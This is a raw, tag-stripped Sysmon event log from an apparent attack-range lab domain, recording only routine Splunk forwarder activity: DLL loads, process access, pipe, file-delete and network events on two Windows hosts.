Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x800000000000000057350219Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:07.858{8B6011A9-5BBB-618E-62F3-04000000F101}9844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057350218Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:07.858{8B6011A9-5BBB-618E-62F3-04000000F101}9844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x800000000000000057350217Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:07.858{8B6011A9-5BBB-618E-62F3-04000000F101}9844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057350216Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:07.858{8B6011A9-5BBB-618E-62F3-04000000F101}9844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x800000000000000057350215Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:07.858{8B6011A9-5BBB-618E-62F3-04000000F101}9844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x800000000000000057350214Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:07.858{8B6011A9-5BBB-618E-62F3-04000000F101}9844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057350213Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:07.858{8B6011A9-5BBB-618E-62F3-04000000F101}9844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 734700x800000000000000057350212Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:07.858{8B6011A9-5BBB-618E-62F3-04000000F101}9844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057350211Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:07.858{8B6011A9-5BBB-618E-62F3-04000000F101}9844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x800000000000000057350210Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:07.858{8B6011A9-5BBB-618E-62F3-04000000F101}9844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x800000000000000057350209Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:07.858{8B6011A9-5BBB-618E-62F3-04000000F101}9844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 10341000x800000000000000057350208Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:07.858{8B6011A9-BB8B-618B-50A0-04000000F101}92124768C:\Windows\system32\conhost.exe{8B6011A9-5BBB-618E-62F3-04000000F101}9844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057350207Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:07.858{8B6011A9-5BBB-618E-62F3-04000000F101}9844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057350206Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:07.858{8B6011A9-5BBB-618E-62F3-04000000F101}9844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057350205Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:07.858{8B6011A9-5BBB-618E-62F3-04000000F101}9844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057350204Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:07.858{8B6011A9-5BBB-618E-62F3-04000000F101}9844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241trueSplunk, Inc.Valid 10341000x800000000000000057350203Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:07.858{8B6011A9-8868-6164-0500-00000000F101}424548C:\Windows\system32\csrss.exe{8B6011A9-5BBB-618E-62F3-04000000F101}9844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057350202Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:07.842{8B6011A9-BB8A-618B-4CA0-04000000F101}74521152C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8B6011A9-5BBB-618E-62F3-04000000F101}9844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000057350201Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:07.843{8B6011A9-5BBB-618E-62F3-04000000F101}9844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{8B6011A9-886B-6164-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x800000000000000057350200Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:19:07.842{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057350199Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:19:07.842{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057350198Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:19:07.842{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057350197Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:19:07.842{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057350196Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:19:07.842{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057350195Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:19:07.842{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 11241100x800000000000000057350194Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:07.343{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057350193Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:07.343{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3574C37BC3D3B7F7A2B056E7F9D80FCF,SHA256=37CEF77B9912C1CFEC92B05DC5D87C63E530D1E692882C0160288737B96EDA6Efalsetrue 354300x800000000000000021219892Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:54.549{AD5E2759-54CF-6143-D400-00000000F101}3540C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64345-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x800000000000000021219891Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:07.142{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9D00BFCDC49963EC75A950B9A1A20C95,SHA256=1F83FBE9425E73A8893F34B4F7DD5C3E279465942DF9B59AA7020C5D37DBAD3B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219890Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:07.142{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D9180EA0D1063425D65F44FEA77D1126,SHA256=C20023AE80069FC7A873B9B223794184346A2277857B37142D327515E88C4177,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057350192Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:07.159{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057350191Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:07.159{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FAE72F0D2C15352589D52CD6E31E84C5,SHA256=961D62AE7E37895027FC4CA5C2269CDC3E70E76D1A303D2B90F2573600614D54falsetrue 10341000x800000000000000021219912Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:08.847{AD5E2759-54C7-6143-AA00-00000000F101}35682904C:\Windows\system32\conhost.exe{AD5E2759-5BBC-618E-18CE-08000000F101}5476C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219911Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:08.847{AD5E2759-5433-6143-0C00-00000000F101}7325560C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219910Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:08.847{AD5E2759-5433-6143-0C00-00000000F101}7325560C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219909Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:08.847{AD5E2759-5432-6143-0500-00000000F101}412980C:\Windows\system32\csrss.exe{AD5E2759-5BBC-618E-18CE-08000000F101}5476C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021219908Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:08.847{AD5E2759-5433-6143-0C00-00000000F101}7325560C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219907Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:08.847{AD5E2759-5433-6143-0C00-00000000F101}7325560C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219906Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:08.847{AD5E2759-54C7-6143-A600-00000000F101}4072516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{AD5E2759-5BBC-618E-18CE-08000000F101}5476C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021219905Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:08.832{AD5E2759-5BBC-618E-18CE-08000000F101}5476C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{AD5E2759-5432-6143-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000021219904Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:08.690{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F882D77478869781D883CC844CDADB31,SHA256=438F13C5C5F2553D3FF5E268591CB61E13C3887F098C74A97FABA657C4438791,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 534500x800000000000000057350315Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.775{8B6011A9-5BBC-618E-63F3-04000000F101}10088C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe 734700x800000000000000057350314Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.760{8B6011A9-5BBC-618E-63F3-04000000F101}10088C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x800000000000000057350313Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.760{8B6011A9-5BBC-618E-63F3-04000000F101}10088C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x800000000000000057350312Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.760{8B6011A9-5BBC-618E-63F3-04000000F101}10088C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 11241100x800000000000000057350311Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.726{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 11241100x800000000000000057350310Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.726{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057350309Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.726{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 